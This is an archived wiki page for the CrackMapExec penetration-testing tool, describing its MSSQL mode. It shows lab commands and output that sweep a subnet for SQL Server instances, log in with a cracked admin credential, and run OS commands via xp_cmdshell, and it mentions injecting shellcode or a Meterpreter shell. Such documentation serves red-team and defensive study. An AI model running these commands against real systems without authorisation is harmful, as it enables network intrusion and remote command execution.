Skip to content
This repository has been archived by the owner on Dec 6, 2023. It is now read-only.

MSSQL Mode

Jump to bottom
byt3bl33d3r edited this page Mar 13, 2016 · 8 revisions

#MSSQL Mode

As of CME version 2.3, you're now able to discover, authenticate, execute queries and commands through TCP enabled MSSQL Databases!

Additionally, if the account you're authenticating as has enough privileges, you can execute commands on the system by using xp_cmdshell !

The --mssql option, switches CME into MSSQL Mode : any additional option you now provide will be executed and/or enumerated through the MSSQL DB!

In this example, we try and enumerate all availabe TCP Enabled MSSQL DBs on the network:

#~ python crackmapexec.py 192.168.0.0/24 --mssql
03-12-2016 18:56:42 SMB 192.168.0.103:445 DC1        [*] Windows 6.3 Build 9600 (name:DC1) (domain:LAB)
03-12-2016 18:56:42 SMB 192.168.0.104:445 WIN10BOX   [*] Windows 10.0 Build 10586 (name:WIN10BOX) (domain:LAB)
03-12-2016 18:56:45 SMB 192.168.0.106:445 WIN7BOX    [*] Windows 6.1 Build 7601 (name:WIN7BOX) (domain:LAB)
03-12-2016 18:56:45 MSSQL 192.168.0.106:1433 WIN7BOX    [*] Found 1 MSSQL instance(s)
03-12-2016 18:56:45 MSSQL 192.168.0.106:1433 WIN7BOX    Instance 0
03-12-2016 18:56:45 MSSQL 192.168.0.106:1433 WIN7BOX    ServerName:WIN7BOX
03-12-2016 18:56:45 MSSQL 192.168.0.106:1433 WIN7BOX    tcp:1433
03-12-2016 18:56:45 MSSQL 192.168.0.106:1433 WIN7BOX    IsClustered:No
03-12-2016 18:56:45 MSSQL 192.168.0.106:1433 WIN7BOX    Version:12.0.2000.8
03-12-2016 18:56:45 MSSQL 192.168.0.106:1433 WIN7BOX    np:\\WIN7BOX\pipe\MSSQL$SQLEXPRESS\sql\query
03-12-2016 18:56:45 MSSQL 192.168.0.106:1433 WIN7BOX    InstanceName:SQLEXPRESS

HA! As we can see from the output there's an MSSQL DB ripe for the pilfering available on 192.168.0.106!

Lets say after using Responder we manage to only get a SQL Admin account hash which we are able to crack. This account has very limited access on machines but has Administrative access over MSSQL DBs.

Have no fear! CME is here!

The following example shows CME executing the whoami command by using xp_cmdshell:

#~ python crackmapexec.py 192.168.0.0/24 --mssql -u SQLAdmin -p password -x 'whoami' 
03-12-2016 19:11:49 SMB 192.168.0.103:445 DC1        [*] Windows 6.3 Build 9600 (name:DC1) (domain:WIN7BOX)
03-12-2016 19:11:49 SMB 192.168.0.104:445 WIN10BOX   [*] Windows 10.0 Build 10586 (name:WIN10BOX) (domain:WIN7BOX)
03-12-2016 19:11:52 SMB 192.168.0.106:445 WIN7BOX    [*] Windows 6.1 Build 7601 (name:WIN7BOX) (domain:WIN7BOX)
03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX    [*] Found 1 MSSQL instance(s)
03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX    Instance 0
03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX    ServerName:WIN7BOX
03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX    tcp:1433
03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX    IsClustered:No
03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX    Version:12.0.2000.8
03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX    np:\\WIN7BOX\pipe\MSSQL$SQLEXPRESS\sql\query
03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX    InstanceName:SQLEXPRESS
03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX    [+] Login successful LAB\SQLAdmin:password
03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX    [+] Executed command via XP_CMDSHELL
03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX    output                                                                            

03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX    --------------------------------------------------------------------------------  

03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX    nt service\mssql$sqlexpress                                                       
03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX    NULL

We can then use the --inject option to execute shellcode or get a Meterpreter shell always through the MSSQL DB!

Overview

  1. Home
Clone this wiki locally